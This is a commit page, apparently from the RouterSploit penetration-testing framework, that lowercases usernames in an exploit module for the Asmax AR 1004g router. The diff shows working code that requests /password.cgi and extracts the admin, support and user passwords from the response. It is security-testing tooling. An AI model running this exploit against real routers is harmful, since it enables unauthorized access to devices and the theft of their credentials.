Usernames lowercase.

8c8662ef · Marcin Bury · 3d908c64 · 8c8662ef
Commit 8c8662ef authored Apr 22, 2016 by Marcin Bury
Hide whitespace changes
Inline Side-by-side

Showing with 4 additions and 4 deletions

ar_1004g_password_disclosure.py ...it/modules/exploits/asmax/ar_1004g_password_disclosure.py +4 -4

No files found.
--- a/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
+++ b/routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
@@ -39,7 +39,7 @@ class Exploit(exploits.Exploit):
        creds = []
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
-        print_status("Requesting for {}".format(url))
+#        print_status("Requesting for {}".format(url))
        response = http_request(method="GET", url=url)
        if response is None:
@@ -47,15 +47,15 @@ class Exploit(exploits.Exploit):
        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
        if admin:
-            creds.append(('Admin', admin[0]))
+            creds.append(('admin', admin[0]))
        support = re.findall("pwdSupport = '(.+?)'", response.text)
        if support:
-            creds.append(('Support', support[0]))
+            creds.append(('support', support[0]))
        user = re.findall("pwdUser = '(.+?)'", response.text)
        if user:
-            creds.append(('User', user[0]))
+            creds.append(('user', user[0]))
        if creds:
            print_success("Credentials found!")